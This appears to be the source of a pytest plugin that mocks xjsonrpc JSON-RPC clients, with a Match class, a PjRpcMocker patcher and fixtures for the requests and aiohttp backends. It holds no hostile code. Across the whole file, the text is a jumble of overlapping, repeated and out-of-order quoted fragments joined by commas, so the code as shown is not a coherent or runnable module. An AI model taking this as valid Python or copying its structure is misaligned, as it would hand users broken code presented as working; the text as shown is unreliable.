@pytest.fixture def xjsonrpc_requests_mocker(): \"\"\" Requests client mocking fixture. \"\"\"", "replace( self, endpoint: str, method_name: str, result: UnsetType = UNSET, error: UnsetType =", "ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request') @pytest.fixture def xjsonrpc_requests_mocker(): \"\"\" Requests client mocking fixture. \"\"\" with PjRpcRequestsMocker()", "once: bool = False, callback: Optional[Callable] = None, ) -> None: \"\"\" Appends", "Dict, Optional, Union import pytest import xjsonrpc from xjsonrpc import Response from xjsonrpc.common", "ConnectionRefusedError() json_data = json.loads(request_text) if isinstance(json_data, (list, tuple)): response = xjsonrpc.BatchResponse() for request", ":param endpoint: request endpoint :param method_name: method name :param version: JSON-RPC request version", "self._calls.values(): for stub in calls.values(): stub.reset_mock() self._calls.clear() def start(self): \"\"\" Activates a patcher.", "of JSON-PRC method calls. 
\"\"\" return self._calls def add( self, endpoint: str, method_name:", "matches = self._matches[endpoint].get((version, method_name)) if not matches: self._matches[endpoint].pop((version, method_name), None) if not self._matches[endpoint]:", "matches = self._matches.get(endpoint) if matches is None: if self._passthrough: return self._patcher.temp_original(origin_self, request_text, is_notification,", "origin_self._endpoint matches = self._matches.get(endpoint) if matches is None: if self._passthrough: return self._patcher.temp_original(origin_self, request_text,", "method_name)) if not matches: self._matches[endpoint].pop((version, method_name), None) if not self._matches[endpoint]: self._matches.pop(endpoint) def _on_request(self,", "import UNSET, UnsetType class Match: \"\"\" Match object. Incorporates request matching information. \"\"\"", "int = 0, ): \"\"\" Replaces a previously added response patch by a", "str, is_notification: bool = False, **kwargs: Any): endpoint = origin_self._endpoint matches = self._matches.get(endpoint)", "a patcher. \"\"\" patcher = self._mocker.patch(self._target) with patcher: if asyncio.iscoroutinefunction(patcher.temp_original): self._async_resp = True", ":param version: JSON-RPC request version :returns: removed response patch \"\"\" if method_name is", "= collections.defaultdict(dict) @property def calls(self) -> Dict: \"\"\" Dictionary of JSON-PRC method calls.", "all added matches and reset call statistics. \"\"\" self._matches.clear() for calls in self._calls.values():", "xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name)) match = matches.pop(0) if not match.once: matches.append(match) self._cleanup_matches(endpoint, version, method_name) stub", "**kwargs): return self._on_request(*args, **kwargs) self._patcher = self._mocker.patch(self._target, side_effect=side_effect, autospec=True) return self._patcher.start() def stop(self)", "Optional[Union[int, str]] = None, version: str = '2.0', once: bool = False, callback:", "be deleted after the first call :param callback: patched request callback \"\"\" match", "match = Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)].append(match) def", "with patcher: if asyncio.iscoroutinefunction(patcher.temp_original): self._async_resp = True if self._async_resp: async def side_effect(*args, **kwargs):", "str, version: str, method_name: str, once: bool, callback: Optional[Callable], **response_data: Any, ): self.endpoint", "typing import Any, Callable, Dict, Optional, Union import pytest import xjsonrpc from xjsonrpc", "be deleted after the first call :param callback: patched request callback :param idx:", "(if there are more than one) \"\"\" match = Match(endpoint, version, method_name, once,", "stub in calls.values(): stub.reset_mock() self._calls.clear() def start(self): \"\"\" Activates a patcher. \"\"\" patcher", "and reset call statistics. \"\"\" self._matches.clear() for calls in self._calls.values(): for stub in", "= self._mocker.patch(self._target) with patcher: if asyncio.iscoroutinefunction(patcher.temp_original): self._async_resp = True if self._async_resp: async def", "**kwargs) else: def side_effect(*args, **kwargs): return self._on_request(*args, **kwargs) self._patcher = self._mocker.patch(self._target, side_effect=side_effect, autospec=True)", "`pytest <https://docs.pytest.org/en/latest/>`_ client library integration. 
Implements some utilities for mocking out ``xjsonrpc`` library", "integration. Implements some utilities for mocking out ``xjsonrpc`` library clients. \"\"\" import asyncio", "the original method \"\"\" def __init__(self, target, mocker=unittest.mock, passthrough: bool = False): self._target", ":param endpoint: request endpoint :param method_name: method name :param result: patched result :param", "= None, version: str = '2.0', once: bool = False, callback: Optional[Callable] =", "= self._matches.pop(endpoint) else: result = self._matches[endpoint].pop((version, method_name)) self._cleanup_matches(endpoint, version, method_name) return result def", "callback \"\"\" match = Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version,", "self, endpoint: str, version: str, method_name: str, params: Optional[Union[list, dict]], id: Optional[Union[int, str]],", "return xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name)) match = matches.pop(0) if not match.once: matches.append(match) self._cleanup_matches(endpoint, version, method_name)", "else: result = match.callback(**params) return xjsonrpc.Response(id=id, result=result) else: return xjsonrpc.Response( id=id or match.response_data['id'],", "return json.dumps(response.to_json()) def _match_request( self, endpoint: str, version: str, method_name: str, params: Optional[Union[list,", ":param id: patched request id :param version: patched request version :param once: if", "Replaces a previously added response patch by a new one. :param endpoint: request", "UnsetType = UNSET, id: Optional[Union[int, str]] = None, version: str = '2.0', once:", "= None) -> None: matches = self._matches[endpoint].get((version, method_name)) if not matches: self._matches[endpoint].pop((version, method_name),", "\"\"\" self._matches.clear() for calls in self._calls.values(): for stub in calls.values(): stub.reset_mock() self._calls.clear() def", "matches and reset call statistics. \"\"\" self._matches.clear() for calls in self._calls.values(): for stub", "in calls.values(): stub.reset_mock() self._calls.clear() def start(self): \"\"\" Activates a patcher. \"\"\" patcher =", "PjRpcRequestsMocker() as mocker: yield mocker @pytest.fixture def xjsonrpc_aiohttp_mocker(): \"\"\" Aiohttp client mocking fixture.", ") else: request = xjsonrpc.Request.from_json(json_data) response = self._match_request(endpoint, request.version, request.method, request.params, request.id) if", "'2.0', method_name: Optional[str] = None) -> None: matches = self._matches[endpoint].get((version, method_name)) if not", "stub.reset_mock() self._calls.clear() def start(self): \"\"\" Activates a patcher. \"\"\" patcher = self._mocker.patch(self._target) with", "method calls. \"\"\" return self._calls def add( self, endpoint: str, method_name: str, result:", "version :param once: if ``True`` the patch will be deleted after the first", "raise ConnectionRefusedError() json_data = json.loads(request_text) if isinstance(json_data, (list, tuple)): response = xjsonrpc.BatchResponse() for", "method_name), None) if not self._matches[endpoint]: self._matches.pop(endpoint) def _on_request(self, origin_self: Any, request_text: str, is_notification:", "error=xjsonrpc.exc.MethodNotFoundError(data=method_name)) match = matches.pop(0) if not match.once: matches.append(match) self._cleanup_matches(endpoint, version, method_name) stub =", "patcher. 
\"\"\" patcher = self._mocker.patch(self._target) with patcher: if asyncio.iscoroutinefunction(patcher.temp_original): self._async_resp = True if", "endpoint :param method_name: method name :param version: JSON-RPC request version :returns: removed response", "= None, ) -> None: \"\"\" Appends response patch. If the same method", "str = '2.0', once: bool = False, callback: Optional[Callable] = None, idx: int", "request.id) if self._async_resp: async def wrapper(): return json.dumps(response.to_json()) return wrapper() else: return json.dumps(response.to_json())", "\"\"\" Dictionary of JSON-PRC method calls. \"\"\" return self._calls def add( self, endpoint:", "self._calls def add( self, endpoint: str, method_name: str, result: UnsetType = UNSET, error:", "result: UnsetType = UNSET, error: UnsetType = UNSET, id: Optional[Union[int, str]] = None,", "\"\"\" Appends response patch. If the same method patch already exists they will", "= False, callback: Optional[Callable] = None, idx: int = 0, ): \"\"\" Replaces", "mocking fixture. \"\"\" with PjRpcRequestsMocker() as mocker: yield mocker @pytest.fixture def xjsonrpc_aiohttp_mocker(): \"\"\"", "is_notification: bool = False, **kwargs: Any): endpoint = origin_self._endpoint matches = self._matches.get(endpoint) if", "request.method, request.params, request.id), ) else: request = xjsonrpc.Request.from_json(json_data) response = self._match_request(endpoint, request.version, request.method,", "self._patcher.start() def stop(self) -> None: \"\"\" Stop an active patcher. \"\"\" self.reset() self._patcher.stop()", "requests to the original method \"\"\" def __init__(self, target, mocker=unittest.mock, passthrough: bool =", "return self def __exit__(self, exc_type, exc_val, exc_tb): self.stop() self.reset() # shortcuts PjRpcRequestsMocker =", "= self._matches.get(endpoint) if matches is None: if self._passthrough: return self._patcher.temp_original(origin_self, request_text, is_notification, **kwargs)", "def __init__( self, endpoint: str, version: str, method_name: str, once: bool, callback: Optional[Callable],", "def calls(self) -> Dict: \"\"\" Dictionary of JSON-PRC method calls. \"\"\" return self._calls", "target='xjsonrpc.client.backend.requests.Client._request') PjRpcAiohttpMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request') @pytest.fixture def xjsonrpc_requests_mocker(): \"\"\" Requests client mocking fixture.", "one. 
:param endpoint: request endpoint :param method_name: method name :param result: patched result", "str, once: bool, callback: Optional[Callable], **response_data: Any, ): self.endpoint = endpoint self.version =", "once: bool, callback: Optional[Callable], **response_data: Any, ): self.endpoint = endpoint self.version = version", "Optional[str] = None, version: str = '2.0'): \"\"\" Removes a previously added response", "= collections.defaultdict(lambda: collections.defaultdict(list)) self._calls: Dict = collections.defaultdict(dict) @property def calls(self) -> Dict: \"\"\"", "Any, request_text: str, is_notification: bool = False, **kwargs: Any): endpoint = origin_self._endpoint matches", "None) -> None: matches = self._matches[endpoint].get((version, method_name)) if not matches: self._matches[endpoint].pop((version, method_name), None)", "\"\"\" match = Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)].append(match)", "response = self._match_request(endpoint, request.version, request.method, request.params, request.id) if self._async_resp: async def wrapper(): return", "= self.calls[endpoint].setdefault( (version, method_name), self._mocker.MagicMock(spec=lambda *args, **kwargs: None, name=f'{endpoint}:{version}:{method_name}'), ) if isinstance(params, (list,", "Optional, Union import pytest import xjsonrpc from xjsonrpc import Response from xjsonrpc.common import", "callback :param idx: patch index (if there are more than one) \"\"\" match", "response patch. :param endpoint: request endpoint :param method_name: method name :param version: JSON-RPC", "self.start() return self def __exit__(self, exc_type, exc_val, exc_tb): self.stop() self.reset() # shortcuts PjRpcRequestsMocker", "target, mocker=unittest.mock, passthrough: bool = False): self._target = target self._mocker = mocker self._patcher", "if self._async_resp: async def wrapper(): return json.dumps(response.to_json()) return wrapper() else: return json.dumps(response.to_json()) def", "import asyncio import collections import functools as ft import json import unittest.mock from", "False): self._target = target self._mocker = mocker self._patcher = None self._async_resp = False", "xjsonrpc import Response from xjsonrpc.common import UNSET, UnsetType class Match: \"\"\" Match object.", "str, method_name: str, once: bool, callback: Optional[Callable], **response_data: Any, ): self.endpoint = endpoint", "str, version: str = '2.0', method_name: Optional[str] = None) -> None: matches =", "def replace( self, endpoint: str, method_name: str, result: UnsetType = UNSET, error: UnsetType", "-> None: \"\"\" Appends response patch. If the same method patch already exists", "Requests client mocking fixture. 
\"\"\" with PjRpcRequestsMocker() as mocker: yield mocker @pytest.fixture def", "removed response patch \"\"\" if method_name is None: result = self._matches.pop(endpoint) else: result", "self._matches.get(endpoint) if matches is None: if self._passthrough: return self._patcher.temp_original(origin_self, request_text, is_notification, **kwargs) else:", "UnsetType = UNSET, error: UnsetType = UNSET, id: Optional[Union[int, str]] = None, version:", "= once self.callback = callback self.response_data = response_data class PjRpcMocker: \"\"\" Synchronous JSON-RPC", "self._mocker = mocker self._patcher = None self._async_resp = False self._passthrough = passthrough self._matches:", "the first call :param callback: patched request callback \"\"\" match = Match(endpoint, version,", "\"\"\" import asyncio import collections import functools as ft import json import unittest.mock", "Synchronous JSON-RPC client mocker. :param target: method to be mocked :param mocker: mocking", "version: str = '2.0', once: bool = False, callback: Optional[Callable] = None, idx:", "added response patch. :param endpoint: request endpoint :param method_name: method name :param version:", "patched error :param id: patched request id :param version: patched request version :param", "Optional[Callable] = None, idx: int = 0, ): \"\"\" Replaces a previously added", "self.calls[endpoint].setdefault( (version, method_name), self._mocker.MagicMock(spec=lambda *args, **kwargs: None, name=f'{endpoint}:{version}:{method_name}'), ) if isinstance(params, (list, tuple)):", "callback: patched request callback \"\"\" match = Match(endpoint, version, method_name, once, id=id, result=result,", "matches: self._matches[endpoint].pop((version, method_name), None) if not self._matches[endpoint]: self._matches.pop(endpoint) def _on_request(self, origin_self: Any, request_text:", "self._mocker.patch(self._target) with patcher: if asyncio.iscoroutinefunction(patcher.temp_original): self._async_resp = True if self._async_resp: async def side_effect(*args,", "endpoint: request endpoint :param method_name: method name :param result: patched result :param error:", "callback self.response_data = response_data class PjRpcMocker: \"\"\" Synchronous JSON-RPC client mocker. :param target:", "mocker self._patcher = None self._async_resp = False self._passthrough = passthrough self._matches: Dict =", "self.stop() self.reset() # shortcuts PjRpcRequestsMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request') PjRpcAiohttpMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request') @pytest.fixture", "first call :param callback: patched request callback \"\"\" match = Match(endpoint, version, method_name,", "json.dumps(response.to_json()) return wrapper() else: return json.dumps(response.to_json()) def _match_request( self, endpoint: str, version: str,", "False, callback: Optional[Callable] = None, ) -> None: \"\"\" Appends response patch. 
If", "matches.append(match) self._cleanup_matches(endpoint, version, method_name) stub = self.calls[endpoint].setdefault( (version, method_name), self._mocker.MagicMock(spec=lambda *args, **kwargs: None,", "request_text, is_notification, **kwargs) else: raise ConnectionRefusedError() json_data = json.loads(request_text) if isinstance(json_data, (list, tuple)):", "endpoint: str, version: str, method_name: str, params: Optional[Union[list, dict]], id: Optional[Union[int, str]], )", "self.callback = callback self.response_data = response_data class PjRpcMocker: \"\"\" Synchronous JSON-RPC client mocker.", "Optional[Union[int, str]], ) -> Response: matches = self._matches[endpoint].get((version, method_name)) if matches is None:", "Removes all added matches and reset call statistics. \"\"\" self._matches.clear() for calls in", "``True`` the patch will be deleted after the first call :param callback: patched", "return await self._on_request(*args, **kwargs) else: def side_effect(*args, **kwargs): return self._on_request(*args, **kwargs) self._patcher =", ":param callback: patched request callback \"\"\" match = Match(endpoint, version, method_name, once, id=id,", "patch \"\"\" if method_name is None: result = self._matches.pop(endpoint) else: result = self._matches[endpoint].pop((version,", "error: patched error :param id: patched request id :param version: patched request version", "the patch will be deleted after the first call :param callback: patched request", "False self._passthrough = passthrough self._matches: Dict = collections.defaultdict(lambda: collections.defaultdict(list)) self._calls: Dict = collections.defaultdict(dict)", "\"\"\" Activates a patcher. \"\"\" patcher = self._mocker.patch(self._target) with patcher: if asyncio.iscoroutinefunction(patcher.temp_original): self._async_resp", "UNSET, id: Optional[Union[int, str]] = None, version: str = '2.0', once: bool =", "request endpoint :param method_name: method name :param result: patched result :param error: patched", "id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)].append(match) def replace( self, endpoint: str, method_name: str,", "method_name: str, result: UnsetType = UNSET, error: UnsetType = UNSET, id: Optional[Union[int, str]]", "previously added response patch by a new one. :param endpoint: request endpoint :param", "self.method_name = method_name self.once = once self.callback = callback self.response_data = response_data class", "= matches.pop(0) if not match.once: matches.append(match) self._cleanup_matches(endpoint, version, method_name) stub = self.calls[endpoint].setdefault( (version,", "\"\"\" Replaces a previously added response patch by a new one. :param endpoint:", "Activates a patcher. \"\"\" patcher = self._mocker.patch(self._target) with patcher: if asyncio.iscoroutinefunction(patcher.temp_original): self._async_resp =", "class Match: \"\"\" Match object. Incorporates request matching information. \"\"\" def __init__( self,", "_on_request(self, origin_self: Any, request_text: str, is_notification: bool = False, **kwargs: Any): endpoint =", "None: \"\"\" Stop an active patcher. 
\"\"\" self.reset() self._patcher.stop() def _cleanup_matches(self, endpoint: str,", "endpoint :param method_name: method name :param result: patched result :param error: patched error", "exc_type, exc_val, exc_tb): self.stop() self.reset() # shortcuts PjRpcRequestsMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request') PjRpcAiohttpMocker =", "patcher: if asyncio.iscoroutinefunction(patcher.temp_original): self._async_resp = True if self._async_resp: async def side_effect(*args, **kwargs): return", "exc_val, exc_tb): self.stop() self.reset() # shortcuts PjRpcRequestsMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request') PjRpcAiohttpMocker = ft.partial(PjRpcMocker,", "patch index (if there are more than one) \"\"\" match = Match(endpoint, version,", "\"\"\" return self._calls def add( self, endpoint: str, method_name: str, result: UnsetType =", ":param error: patched error :param id: patched request id :param version: patched request", "str, method_name: str, params: Optional[Union[list, dict]], id: Optional[Union[int, str]], ) -> Response: matches", "__exit__(self, exc_type, exc_val, exc_tb): self.stop() self.reset() # shortcuts PjRpcRequestsMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request') PjRpcAiohttpMocker", "result: patched result :param error: patched error :param id: patched request id :param", "added matches and reset call statistics. \"\"\" self._matches.clear() for calls in self._calls.values(): for", "str = '2.0', method_name: Optional[str] = None) -> None: matches = self._matches[endpoint].get((version, method_name))", "import json import unittest.mock from typing import Any, Callable, Dict, Optional, Union import", "mocker: yield mocker @pytest.fixture def xjsonrpc_aiohttp_mocker(): \"\"\" Aiohttp client mocking fixture. \"\"\" with", "str, method_name: str, result: UnsetType = UNSET, error: UnsetType = UNSET, id: Optional[Union[int,", "tuple)): stub(*params) else: stub(**params) if match.callback: if isinstance(params, (list, tuple)): result = match.callback(*params)", "collections import functools as ft import json import unittest.mock from typing import Any,", "self._matches[endpoint].pop((version, method_name), None) if not self._matches[endpoint]: self._matches.pop(endpoint) def _on_request(self, origin_self: Any, request_text: str,", "for mocking out ``xjsonrpc`` library clients. \"\"\" import asyncio import collections import functools", "UNSET, error: UnsetType = UNSET, id: Optional[Union[int, str]] = None, version: str =", "result def reset(self) -> None: \"\"\" Removes all added matches and reset call", "result=match.response_data['result'], error=match.response_data['error'], ) def __enter__(self): self.start() return self def __exit__(self, exc_type, exc_val, exc_tb):", "id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)][idx] = match def remove(self, endpoint: str, method_name:", "patcher. \"\"\" self.reset() self._patcher.stop() def _cleanup_matches(self, endpoint: str, version: str = '2.0', method_name:", "None, idx: int = 0, ): \"\"\" Replaces a previously added response patch", "method_name)) self._cleanup_matches(endpoint, version, method_name) return result def reset(self) -> None: \"\"\" Removes all", ") if isinstance(params, (list, tuple)): stub(*params) else: stub(**params) if match.callback: if isinstance(params, (list,", "active patcher. 
\"\"\" self.reset() self._patcher.stop() def _cleanup_matches(self, endpoint: str, version: str = '2.0',", "def reset(self) -> None: \"\"\" Removes all added matches and reset call statistics.", "patched request id :param version: patched request version :param once: if ``True`` the", "**response_data: Any, ): self.endpoint = endpoint self.version = version self.method_name = method_name self.once", "request callback :param idx: patch index (if there are more than one) \"\"\"", "method_name: str, params: Optional[Union[list, dict]], id: Optional[Union[int, str]], ) -> Response: matches =", "None, ) -> None: \"\"\" Appends response patch. If the same method patch", "JSON-RPC client mocker. :param target: method to be mocked :param mocker: mocking package", "\"\"\" Stop an active patcher. \"\"\" self.reset() self._patcher.stop() def _cleanup_matches(self, endpoint: str, version:", "endpoint: str, method_name: str, result: UnsetType = UNSET, error: UnsetType = UNSET, id:", "<https://docs.pytest.org/en/latest/>`_ client library integration. Implements some utilities for mocking out ``xjsonrpc`` library clients.", "Incorporates request matching information. \"\"\" def __init__( self, endpoint: str, version: str, method_name:", "from typing import Any, Callable, Dict, Optional, Union import pytest import xjsonrpc from", "self._calls: Dict = collections.defaultdict(dict) @property def calls(self) -> Dict: \"\"\" Dictionary of JSON-PRC", "@property def calls(self) -> Dict: \"\"\" Dictionary of JSON-PRC method calls. \"\"\" return", "\"\"\" Removes all added matches and reset call statistics. \"\"\" self._matches.clear() for calls", "in a round-robin way. :param endpoint: request endpoint :param method_name: method name :param", "after the first call :param callback: patched request callback :param idx: patch index", "self._async_resp = True if self._async_resp: async def side_effect(*args, **kwargs): return await self._on_request(*args, **kwargs)", "matches.pop(0) if not match.once: matches.append(match) self._cleanup_matches(endpoint, version, method_name) stub = self.calls[endpoint].setdefault( (version, method_name),", "bool = False, **kwargs: Any): endpoint = origin_self._endpoint matches = self._matches.get(endpoint) if matches", "bool, callback: Optional[Callable], **response_data: Any, ): self.endpoint = endpoint self.version = version self.method_name", "self._cleanup_matches(endpoint, version, method_name) return result def reset(self) -> None: \"\"\" Removes all added", "callback: patched request callback :param idx: patch index (if there are more than", "pytest import xjsonrpc from xjsonrpc import Response from xjsonrpc.common import UNSET, UnsetType class", "def side_effect(*args, **kwargs): return await self._on_request(*args, **kwargs) else: def side_effect(*args, **kwargs): return self._on_request(*args,", "for calls in self._calls.values(): for stub in calls.values(): stub.reset_mock() self._calls.clear() def start(self): \"\"\"", "origin_self: Any, request_text: str, is_notification: bool = False, **kwargs: Any): endpoint = origin_self._endpoint", "self._patcher.temp_original(origin_self, request_text, is_notification, **kwargs) else: raise ConnectionRefusedError() json_data = json.loads(request_text) if isinstance(json_data, (list,", "calls. 
\"\"\" return self._calls def add( self, endpoint: str, method_name: str, result: UnsetType", "request.version, request.method, request.params, request.id) if self._async_resp: async def wrapper(): return json.dumps(response.to_json()) return wrapper()", "patched result :param error: patched error :param id: patched request id :param version:", "method_name)].append(match) def replace( self, endpoint: str, method_name: str, result: UnsetType = UNSET, error:", "\"\"\" patcher = self._mocker.patch(self._target) with patcher: if asyncio.iscoroutinefunction(patcher.temp_original): self._async_resp = True if self._async_resp:", "call statistics. \"\"\" self._matches.clear() for calls in self._calls.values(): for stub in calls.values(): stub.reset_mock()", "str, params: Optional[Union[list, dict]], id: Optional[Union[int, str]], ) -> Response: matches = self._matches[endpoint].get((version,", "ft import json import unittest.mock from typing import Any, Callable, Dict, Optional, Union", "request version :returns: removed response patch \"\"\" if method_name is None: result =", "# shortcuts PjRpcRequestsMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request') PjRpcAiohttpMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request') @pytest.fixture def xjsonrpc_requests_mocker():", "endpoint: str, version: str, method_name: str, once: bool, callback: Optional[Callable], **response_data: Any, ):", "method_name: str, once: bool, callback: Optional[Callable], **response_data: Any, ): self.endpoint = endpoint self.version", "match def remove(self, endpoint: str, method_name: Optional[str] = None, version: str = '2.0'):", "exc_tb): self.stop() self.reset() # shortcuts PjRpcRequestsMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request') PjRpcAiohttpMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request')", "as mocker: yield mocker @pytest.fixture def xjsonrpc_aiohttp_mocker(): \"\"\" Aiohttp client mocking fixture. \"\"\"", "error=error, callback=callback) self._matches[endpoint][(version, method_name)].append(match) def replace( self, endpoint: str, method_name: str, result: UnsetType", "response patch \"\"\" if method_name is None: result = self._matches.pop(endpoint) else: result =", "isinstance(params, (list, tuple)): stub(*params) else: stub(**params) if match.callback: if isinstance(params, (list, tuple)): result", "str, version: str, method_name: str, params: Optional[Union[list, dict]], id: Optional[Union[int, str]], ) ->", "method_name)][idx] = match def remove(self, endpoint: str, method_name: Optional[str] = None, version: str", "if not self._matches[endpoint]: self._matches.pop(endpoint) def _on_request(self, origin_self: Any, request_text: str, is_notification: bool =", "None: return xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name)) match = matches.pop(0) if not match.once: matches.append(match) self._cleanup_matches(endpoint, version,", "method_name), self._mocker.MagicMock(spec=lambda *args, **kwargs: None, name=f'{endpoint}:{version}:{method_name}'), ) if isinstance(params, (list, tuple)): stub(*params) else:", "callback: Optional[Callable] = None, ) -> None: \"\"\" Appends response patch. 
If the", "ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request') PjRpcAiohttpMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request') @pytest.fixture def xjsonrpc_requests_mocker(): \"\"\" Requests client mocking", "xjsonrpc.Response( id=id or match.response_data['id'], result=match.response_data['result'], error=match.response_data['error'], ) def __enter__(self): self.start() return self def", "import Any, Callable, Dict, Optional, Union import pytest import xjsonrpc from xjsonrpc import", "= None self._async_resp = False self._passthrough = passthrough self._matches: Dict = collections.defaultdict(lambda: collections.defaultdict(list))", "return json.dumps(response.to_json()) return wrapper() else: return json.dumps(response.to_json()) def _match_request( self, endpoint: str, version:", "method to be mocked :param mocker: mocking package :param passthrough: pass not mocked", "Union import pytest import xjsonrpc from xjsonrpc import Response from xjsonrpc.common import UNSET,", "self._matches[endpoint]: self._matches.pop(endpoint) def _on_request(self, origin_self: Any, request_text: str, is_notification: bool = False, **kwargs:", "error :param id: patched request id :param version: patched request version :param once:", "return self._patcher.temp_original(origin_self, request_text, is_notification, **kwargs) else: raise ConnectionRefusedError() json_data = json.loads(request_text) if isinstance(json_data,", "out ``xjsonrpc`` library clients. \"\"\" import asyncio import collections import functools as ft", "result = self._matches.pop(endpoint) else: result = self._matches[endpoint].pop((version, method_name)) self._cleanup_matches(endpoint, version, method_name) return result", "else: raise ConnectionRefusedError() json_data = json.loads(request_text) if isinstance(json_data, (list, tuple)): response = xjsonrpc.BatchResponse()", "None: \"\"\" Removes all added matches and reset call statistics. \"\"\" self._matches.clear() for", ":param result: patched result :param error: patched error :param id: patched request id", "passthrough self._matches: Dict = collections.defaultdict(lambda: collections.defaultdict(list)) self._calls: Dict = collections.defaultdict(dict) @property def calls(self)", ":param idx: patch index (if there are more than one) \"\"\" match =", "params: Optional[Union[list, dict]], id: Optional[Union[int, str]], ) -> Response: matches = self._matches[endpoint].get((version, method_name))", "start(self): \"\"\" Activates a patcher. \"\"\" patcher = self._mocker.patch(self._target) with patcher: if asyncio.iscoroutinefunction(patcher.temp_original):", "if isinstance(params, (list, tuple)): result = match.callback(*params) else: result = match.callback(**params) return xjsonrpc.Response(id=id,", "if matches is None: return xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name)) match = matches.pop(0) if not match.once:", "self._async_resp: async def wrapper(): return json.dumps(response.to_json()) return wrapper() else: return json.dumps(response.to_json()) def _match_request(", "return xjsonrpc.Response(id=id, result=result) else: return xjsonrpc.Response( id=id or match.response_data['id'], result=match.response_data['result'], error=match.response_data['error'], ) def", "xjsonrpc_aiohttp_mocker(): \"\"\" Aiohttp client mocking fixture. 
\"\"\" with PjRpcAiohttpMocker() as mocker: yield mocker", "result = match.callback(**params) return xjsonrpc.Response(id=id, result=result) else: return xjsonrpc.Response( id=id or match.response_data['id'], result=match.response_data['result'],", "in self._calls.values(): for stub in calls.values(): stub.reset_mock() self._calls.clear() def start(self): \"\"\" Activates a", "self._matches[endpoint].get((version, method_name)) if matches is None: return xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name)) match = matches.pop(0) if", ":param passthrough: pass not mocked requests to the original method \"\"\" def __init__(self,", "once: bool = False, callback: Optional[Callable] = None, idx: int = 0, ):", "response patch. If the same method patch already exists they will be used", "version, method_name) stub = self.calls[endpoint].setdefault( (version, method_name), self._mocker.MagicMock(spec=lambda *args, **kwargs: None, name=f'{endpoint}:{version}:{method_name}'), )", "False, callback: Optional[Callable] = None, idx: int = 0, ): \"\"\" Replaces a", "= ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request') PjRpcAiohttpMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request') @pytest.fixture def xjsonrpc_requests_mocker(): \"\"\" Requests client", "'2.0', once: bool = False, callback: Optional[Callable] = None, ) -> None: \"\"\"", "Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)][idx] = match def", "used in a round-robin way. :param endpoint: request endpoint :param method_name: method name", "object. Incorporates request matching information. \"\"\" def __init__( self, endpoint: str, version: str,", "Optional[Union[list, dict]], id: Optional[Union[int, str]], ) -> Response: matches = self._matches[endpoint].get((version, method_name)) if", "library integration. Implements some utilities for mocking out ``xjsonrpc`` library clients. \"\"\" import", "Any, ): self.endpoint = endpoint self.version = version self.method_name = method_name self.once =", "to be mocked :param mocker: mocking package :param passthrough: pass not mocked requests", "patched request callback :param idx: patch index (if there are more than one)", "Dict: \"\"\" Dictionary of JSON-PRC method calls. \"\"\" return self._calls def add( self,", "wrapper() else: return json.dumps(response.to_json()) def _match_request( self, endpoint: str, version: str, method_name: str,", "method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)].append(match) def replace( self, endpoint: str,", "\"\"\" self.reset() self._patcher.stop() def _cleanup_matches(self, endpoint: str, version: str = '2.0', method_name: Optional[str]", "if isinstance(params, (list, tuple)): stub(*params) else: stub(**params) if match.callback: if isinstance(params, (list, tuple)):", "-> None: \"\"\" Removes all added matches and reset call statistics. 
\"\"\" self._matches.clear()", "self.once = once self.callback = callback self.response_data = response_data class PjRpcMocker: \"\"\" Synchronous", "= self._matches[endpoint].get((version, method_name)) if matches is None: return xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name)) match = matches.pop(0)", "patcher = self._mocker.patch(self._target) with patcher: if asyncio.iscoroutinefunction(patcher.temp_original): self._async_resp = True if self._async_resp: async", "= xjsonrpc.Request.from_json(json_data) response = self._match_request(endpoint, request.version, request.method, request.params, request.id) if self._async_resp: async def", "not matches: self._matches[endpoint].pop((version, method_name), None) if not self._matches[endpoint]: self._matches.pop(endpoint) def _on_request(self, origin_self: Any,", "collections.defaultdict(list)) self._calls: Dict = collections.defaultdict(dict) @property def calls(self) -> Dict: \"\"\" Dictionary of", "= self._match_request(endpoint, request.version, request.method, request.params, request.id) if self._async_resp: async def wrapper(): return json.dumps(response.to_json())", "mocker @pytest.fixture def xjsonrpc_aiohttp_mocker(): \"\"\" Aiohttp client mocking fixture. \"\"\" with PjRpcAiohttpMocker() as", ":param once: if ``True`` the patch will be deleted after the first call", "as ft import json import unittest.mock from typing import Any, Callable, Dict, Optional,", "endpoint self.version = version self.method_name = method_name self.once = once self.callback = callback", "added response patch by a new one. :param endpoint: request endpoint :param method_name:", "Optional[Callable] = None, ) -> None: \"\"\" Appends response patch. If the same", "be mocked :param mocker: mocking package :param 